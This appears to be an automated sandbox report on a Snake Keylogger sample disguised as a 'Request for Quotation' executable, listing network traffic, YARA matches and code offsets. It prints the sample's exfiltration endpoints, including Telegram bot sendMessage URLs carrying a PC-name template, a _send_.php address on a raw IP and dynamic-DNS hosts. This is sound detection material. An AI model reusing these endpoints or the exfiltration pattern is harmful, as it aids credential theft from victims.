Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBsq
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/x
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_00EFD51C 0_2_00EFD51C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C5CF90 0_2_06C5CF90
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C55798 0_2_06C55798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C57278 0_2_06C57278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C55360 0_2_06C55360
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C56E40 0_2_06C56E40
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C54F28 0_2_06C54F28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125C146 9_2_0125C146
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_01255362 9_2_01255362
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125D278 9_2_0125D278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125C468 9_2_0125C468
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125C738 9_2_0125C738
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_012569A0 9_2_012569A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125E988 9_2_0125E988
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_012529E0 9_2_012529E0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125CA08 9_2_0125CA08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125CCD8 9_2_0125CCD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125CFA9 9_2_0125CFA9
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_01256FC8 9_2_01256FC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_01253E09 9_2_01253E09
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125F961 9_2_0125F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0125E97A 9_2_0125E97A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05978FB0 9_2_05978FB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059781D0 9_2_059781D0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05977B78 9_2_05977B78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059715F8 9_2_059715F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059715E8 9_2_059715E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970D39 9_2_05970D39
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E538 9_2_0597E538
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C558 9_2_0597C558
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970D48 9_2_05970D48
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E548 9_2_0597E548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C548 9_2_0597C548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970498 9_2_05970498
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970489 9_2_05970489
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976488 9_2_05976488
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597DC19 9_2_0597DC19
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597FC18 9_2_0597FC18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597BC38 9_2_0597BC38
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597BC2A 9_2_0597BC2A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597DC28 9_2_0597DC28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05973450 9_2_05973450
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976478 9_2_05976478
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05973460 9_2_05973460
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597D798 9_2_0597D798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597B798 9_2_0597B798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597D787 9_2_0597D787
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05975780 9_2_05975780
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597F788 9_2_0597F788
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05978FA1 9_2_05978FA1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597B7A8 9_2_0597B7A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972FF9 9_2_05972FF9
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05977710 9_2_05977710
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05977720 9_2_05977720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972758 9_2_05972758
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972749 9_2_05972749
